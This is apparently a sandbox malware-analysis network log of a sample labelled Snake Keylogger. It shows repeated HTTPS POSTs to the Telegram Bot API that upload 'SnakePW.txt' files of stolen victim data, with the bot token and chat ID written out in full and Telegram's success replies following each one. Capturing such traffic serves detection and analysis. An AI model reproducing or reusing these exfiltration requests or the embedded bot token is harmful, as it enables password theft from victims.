                                                                    2022-06-26 07:32:43 UTC22OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 36 33 61 35 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d763a5beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:43 UTC22INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:43 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66759,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    130192.168.2.549984149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:34 UTC219OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f59c4f71
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:34 UTC219OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 39 63 34 66 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f59c4f71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:34 UTC220INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:34 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:34 UTC220INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66891,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    131192.168.2.549985149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:34 UTC221OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f5d7ec7d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:34 UTC221OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 64 37 65 63 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f5d7ec7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:35 UTC222INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:35 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:35 UTC222INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66892,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    132192.168.2.549986149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:35 UTC222OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f615e5bb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:35 UTC223OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 31 35 65 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f615e5bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:35 UTC223INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:35 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:35 UTC224INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66893,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228815,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    133192.168.2.549987149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:35 UTC224OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f653e20d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:35 UTC224OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 35 33 65 32 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f653e20dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:35 UTC225INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:35 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:35 UTC225INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66895,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228815,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    134192.168.2.549988149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:35 UTC226OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f68f7cf8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:35 UTC226OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 38 66 37 63 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f68f7cf8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:36 UTC227INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:36 UTC227INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66896,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    135192.168.2.549989149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:36 UTC227OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f6cd7a55
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:36 UTC228OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 63 64 37 61 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f6cd7a55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:36 UTC228INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:36 UTC229INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66897,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    136192.168.2.549990149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:36 UTC229OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f701edeb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
